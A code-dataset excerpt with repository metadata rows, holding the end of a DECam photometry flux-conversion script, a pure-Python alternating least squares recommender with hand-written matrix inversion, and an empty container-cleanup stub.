print(np.allclose(photom['Decam_mag_g'], (-2.5*np.log10(photom['Decam_flux_g']))-56.1),
np.allclose(photom['Decam_mag_r'], (-2.5*np.log10(photom['Decam_flux_r']))-56.1),
np.allclose(photom['Decam_mag_i'], (-2.5*np.log10(photom['Decam_flux_i']))-56.1),
np.allclose(photom['Decam_mag_z'], (-2.5*np.log10(photom['Decam_flux_z']))-56.1),
np.allclose(photom['Decam_mag_Y'], (-2.5*np.log10(photom['Decam_flux_Y']))-56.1))
for col in ['Decam_flux_g', 'Decam_flux_r', 'Decam_flux_i', 'Decam_flux_z', 'Decam_flux_Y', 'Decam_flux_error_g', 'Decam_flux_error_r', 'Decam_flux_error_i', 'Decam_flux_error_z', 'Decam_flux_error_Y']:
photom[col.replace('Decam_', '')] = photom[col] * 10**31.44
print(np.allclose(photom['Decam_mag_g'], (22.5-2.5*np.log10(photom['flux_g']))),
np.allclose(photom['Decam_mag_r'], (22.5-2.5*np.log10(photom['flux_r']))),
np.allclose(photom['Decam_mag_i'], (22.5-2.5*np.log10(photom['flux_i']))),
np.allclose(photom['Decam_mag_z'], (22.5-2.5*np.log10(photom['flux_z']))),
np.allclose(photom['Decam_mag_Y'], (22.5-2.5*np.log10(photom['flux_Y']))))
photom = photom[['source_id', 'flux_g', 'flux_r', 'flux_i', 'flux_z', 'flux_Y', 'flux_error_g', 'flux_error_r', 'flux_error_i', 'flux_error_z', 'flux_error_Y']]
photom.write(output_fn)
return None
n_process = 16
with Pool(processes=n_process) as pool:
res = pool.map(do_something, fns, chunksize=1)
| [
"[email protected]"
] | |
76c636adc6a52dcef38e9fc2977e6afa5a920185 | a0de3a09c857fab7281e4ca4a70a256a4a3575cb | /als.py | b35a28e27cad3706c3bcf527164858c394b50fad | [] | no_license | poker-HuDL/machine-learning | 16fcda0ef7221f6d534b1fa929550894bc775c8a | 8cfae1e944faa67244f18d03d10ca7dd7323be19 | refs/heads/master | 2022-02-27T01:03:19.122602 | 2019-11-07T09:56:16 | 2019-11-07T09:56:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,658 | py | #coding=utf-8
from collections import defaultdict
from random import random
from itertools import product, chain
from time import time
def load_movie_ratings():
f = open("boston/movie_ratings.csv")
lines = iter(f)
col_names = ", ".join(next(lines)[:-1].split(",")[:-1])
print("The column names are: %s." % col_names)
data = [[float(x) if i == 2 else int(x)
for i, x in enumerate(line[:-1].split(",")[:-1])]
for line in lines]
f.close()
return data
class Matrix(object):
def __init__(self, data):
self.data = data
self.shape = (len(data), len(data[0]))
def row(self, row_no):
return Matrix([self.data[row_no]])
def col(self, col_no):
m = self.shape[0]
return Matrix([[self.data[i][col_no]] for i in range(m)])
@property
def is_square(self):
return self.shape[0] == self.shape[1]
@property
def transpose(self):
data = list(map(list, zip(*self.data)))
return Matrix(data)
# Build an n x n identity matrix
def _eye(self, n):
return [[0 if i != j else 1 for j in range(n)] for i in range(n)]
@property
def eye(self):
assert self.is_square, "The matrix has to be square!"
data = self._eye(self.shape[0])
return Matrix(data)
# Gaussian elimination on an augmented matrix
def gaussian_elimination(self, aug_matrix):
n = len(aug_matrix)
m = len(aug_matrix[0])
# From top to bottom.
for col_idx in range(n):
# Check if element on the diagonal is zero.
if aug_matrix[col_idx][col_idx] == 0:
row_idx = col_idx
# Find a row whose element has same column index with
# the element on the diagonal is not zero.
while row_idx < n and aug_matrix[row_idx][col_idx] == 0:
row_idx += 1
# Add this row to the row of the element on the diagonal.
for i in range(col_idx, m):
aug_matrix[col_idx][i] += aug_matrix[row_idx][i]
# Elimiate the non-zero element.
for i in range(col_idx + 1, n):
# Skip the zero element.
if aug_matrix[i][col_idx] == 0:
continue
# Elimiate the non-zero element.
k = aug_matrix[i][col_idx] / aug_matrix[col_idx][col_idx]
for j in range(col_idx, m):
aug_matrix[i][j] -= k * aug_matrix[col_idx][j]
# From bottom to top.
for col_idx in range(n - 1, -1, -1):
# Elimiate the non-zero element.
for i in range(col_idx):
# Skip the zero element.
if aug_matrix[i][col_idx] == 0:
continue
# Elimiate the non-zero element.
k = aug_matrix[i][col_idx] / aug_matrix[col_idx][col_idx]
for j in chain(range(i, col_idx + 1), range(n, m)):
aug_matrix[i][j] -= k * aug_matrix[col_idx][j]
# Iterate the element on the diagonal.
for i in range(n):
k = 1 / aug_matrix[i][i]
aug_matrix[i][i] *= k
for j in range(n, m):
aug_matrix[i][j] *= k
return aug_matrix
# Matrix inversion on the underlying list-of-lists data
def _inverse(self, data):
n = len(data)
unit_matrix = self._eye(n)
aug_matrix = [a + b for a, b in zip(self.data, unit_matrix)]
ret = self.gaussian_elimination(aug_matrix)
return list(map(lambda x: x[n:], ret))
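# Worked example (added for clarity): inverting [[2, 0], [0, 4]] builds the augmented
# matrix [[2, 0, 1, 0], [0, 4, 0, 1]]; elimination leaves the off-diagonal zeros
# untouched and the final scaling step gives [[1, 0, 0.5, 0], [0, 1, 0, 0.25]], so the
# right half [[0.5, 0], [0, 0.25]] is returned as the inverse.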
# Matrix inverse computed via Gauss-Jordan elimination; reference: https://baike.baidu.com/item/%E9%AB%98%E6%96%AF%E6%B6%88%E5%85%83%E6%B3%95/619561?fr=aladdin
@property
def inverse(self):
assert self.is_square, "The matrix has to be square!"
data = self._inverse(self.data)
return Matrix(data)
def row_mul(self, row_A, row_B):
return sum(x[0] * x[1] for x in zip(row_A, row_B))
def _mat_mul(self, row_A, B):
row_pairs = product([row_A], B.transpose.data)
return [self.row_mul(*row_pair) for row_pair in row_pairs]
def mat_mul(self, B):
assert self.shape[1] == B.shape[0], "A's column count does not match B's row count!"
return Matrix([self._mat_mul(row_A, B) for row_A in self.data])
def _mean(self, data):
m = len(data)
n = len(data[0])
ret = [0 for _ in range(n)]
for row in data:
for j in range(n):
ret[j] += row[j] / m
return ret
def mean(self, data):
return Matrix([self._mean(self.data)])
# Decorator that measures and prints the total run time of a function
# (note that it calls fn immediately when applied); fn is the function to be timed
def run_time(fn):
def fun():
start = time()
fn()
ret = time() - start
if ret < 1e-6:
unit = "ns"
ret *= 1e9
elif ret < 1e-3:
unit = "us"
ret *= 1e6
elif ret < 1:
unit = "ms"
ret *= 1e3
else:
unit = "s"
print("Total run time is %.1f %s\n" % (ret, unit))
return fun()
class ALS(object):
# Initialization: store the user IDs, the item IDs, the mapping from user ID to user-matrix
# column index, the mapping from item ID to item-matrix column index, the items each user has rated, the shape of the rating matrix, and the RMSE
def __init__(self):
self.user_ids = None
self.item_ids = None
self.user_ids_dict = None
self.item_ids_dict = None
self.user_matrix = None
self.item_matrix = None
self.user_items = None
self.shape = None
self.rmse = None
# Preprocess the training data to get the user IDs, the item IDs, the user-ID-to-column and
# item-ID-to-column mappings, the shape of the rating matrix, and the rating matrix together with its transpose.
def process_data(self, X):
self.user_ids = tuple((set(map(lambda x: x[0], X))))
self.user_ids_dict = dict(map(lambda x: x[::-1], enumerate(self.user_ids)))
self.item_ids = tuple((set(map(lambda x: x[1], X))))
self.item_ids_dict = dict(map(lambda x: x[::-1], enumerate(self.item_ids)))
self.shape = (len(self.user_ids), len(self.item_ids))
ratings = defaultdict(lambda : defaultdict(int))
ratings_T = defaultdict(lambda : defaultdict(int))
for row in X:
user_id, item_id, rating = row
ratings[user_id][item_id] = rating
ratings_T[item_id][user_id] = rating
err_msg = "Length of user_ids %d and ratings %d not match!" % (
len(self.user_ids), len(ratings))
assert len(self.user_ids) == len(ratings), err_msg
err_msg = "Length of item_ids %d and ratings_T %d not match!" % (
len(self.item_ids), len(ratings_T))
assert len(self.item_ids) == len(ratings_T), err_msg
return ratings, ratings_T
# Multiply the user matrix by the (sparse) rating matrix: a dense-by-sparse matrix multiplication yielding their product.
def users_mul_ratings(self, users, ratings_T):
def f(users_row, item_id):
user_ids = iter(ratings_T[item_id].keys())
scores = iter(ratings_T[item_id].values())
col_nos = map(lambda x: self.user_ids_dict[x], user_ids)
_users_row = map(lambda x: users_row[x], col_nos)
return sum(a * b for a, b in zip(_users_row, scores))
ret = [[f(users_row, item_id) for item_id in self.item_ids]
for users_row in users.data]
return Matrix(ret)
# Multiply the item matrix by the (sparse) rating matrix: a dense-by-sparse matrix multiplication yielding their product.
def items_mul_ratings(self, items, ratings):
def f(items_row, user_id):
item_ids = iter(ratings[user_id].keys())
scores = iter(ratings[user_id].values())
col_nos = map(lambda x: self.item_ids_dict[x], item_ids)
_items_row = map(lambda x: items_row[x], col_nos)
return sum(a * b for a, b in zip(_items_row, scores))
ret = [[f(items_row, user_id) for user_id in self.user_ids]
for items_row in items.data]
return Matrix(ret)
# Generate a random matrix with values drawn uniformly from [0, 1)
def gen_random_matrix(self, n_rows, n_colums):
data = [[random() for _ in range(n_colums)] for _ in range(n_rows)]
return Matrix(data)
# Compute the RMSE over the observed ratings
def get_rmse(self, ratings):
m, n = self.shape
mse = 0.0
n_elements = sum(map(len, ratings.values()))
for i in range(m):
for j in range(n):
user_id = self.user_ids[i]
item_id = self.item_ids[j]
rating = ratings[user_id][item_id]
if rating > 0:
user_row = self.user_matrix.col(i).transpose
item_col = self.item_matrix.col(j)
rating_hat = user_row.mat_mul(item_col).data[0][0]
square_error = (rating - rating_hat) ** 2
mse += square_error / n_elements
return mse ** 0.5
# Train the model:
# 1. Preprocess the data
# 2. Check that the parameter k is valid
# 3. Generate a random user matrix U
# 4. Alternately solve for the user matrix and the item matrix, printing the RMSE, until max_iter iterations are reached
# 5. Store the final RMSE
def fit(self, X, k, max_iter=10):
ratings, ratings_T = self.process_data(X)
self.user_items = {k: set(v.keys()) for k,v in ratings.items()}
m, n = self.shape
error_msg = "Parameter k must be less than the rank of original matrix"
assert k < min(m, n), error_msg
self.user_matrix = self.gen_random_matrix(k, m)
for i in range(max_iter):
if i % 2:
items = self.item_matrix
self.user_matrix = self.items_mul_ratings(
items.mat_mul(items.transpose).inverse.mat_mul(items),
ratings
)
else:
users = self.user_matrix
self.item_matrix = self.users_mul_ratings(
users.mat_mul(users.transpose).inverse.mat_mul(users),
ratings_T
)
rmse = self.get_rmse(ratings)
print("Iterations: %d, RMSE: %.6f" % (i + 1, rmse))
self.rmse = rmse
# Recommend the top items for a single user
def _predict(self, user_id, n_items):
users_col = self.user_matrix.col(self.user_ids_dict[user_id])
users_col = users_col.transpose
items_col = enumerate(users_col.mat_mul(self.item_matrix).data[0])
items_scores = map(lambda x: (self.item_ids[x[0]], x[1]), items_col)
viewed_items = self.user_items[user_id]
items_scores = filter(lambda x: x[0] not in viewed_items, items_scores)
return sorted(items_scores, key=lambda x: x[1], reverse=True)[:n_items]
# Recommend the top items for multiple users
def predict(self, user_ids, n_items=10):
return [self._predict(user_id, n_items) for user_id in user_ids]
def format_prediction(item_id, score):
return "item_id:%d score:%.2f" % (item_id, score)
@run_time
def main():
print("Tesing the accuracy of ALS...")
X = load_movie_ratings()
model = ALS()
model.fit(X, k=3, max_iter=5)
print("Showing the predictions of users...")
user_ids = range(1, 5)
predictions = model.predict(user_ids, n_items=2)
for user_id, prediction in zip(user_ids, predictions):
_prediction = [format_prediction(item_id, score)
for item_id, score in prediction]
print("User id:%d recommedation: %s" % (user_id, _prediction))
| [
"[email protected]"
] | |
167e0aa64ce2767420af626e5aa6e2b676c439ca | 7c74e87d80ef98f9758eda322a00209e7cb493ae | /leader/src/main/market/utils/QuitContainer.py | 4aa38f2d1b09ec560235078f356e2f230a209832 | [] | no_license | rorymcstay/car | f95e8623b34e1f36078b1aa789d46d6fc0897c36 | b1640253d06b165b999af47b889a07b865b9809e | refs/heads/master | 2020-05-07T16:03:40.158430 | 2019-09-15T13:15:49 | 2019-09-15T13:15:49 | 180,664,010 | 1 | 0 | null | 2019-04-23T23:24:42 | 2019-04-10T21:07:06 | Python | UTF-8 | Python | false | false | 92 | py | """
Contains methods for cleaning up containers
"""
def quit_container(container):
pass | [
"[email protected]"
] |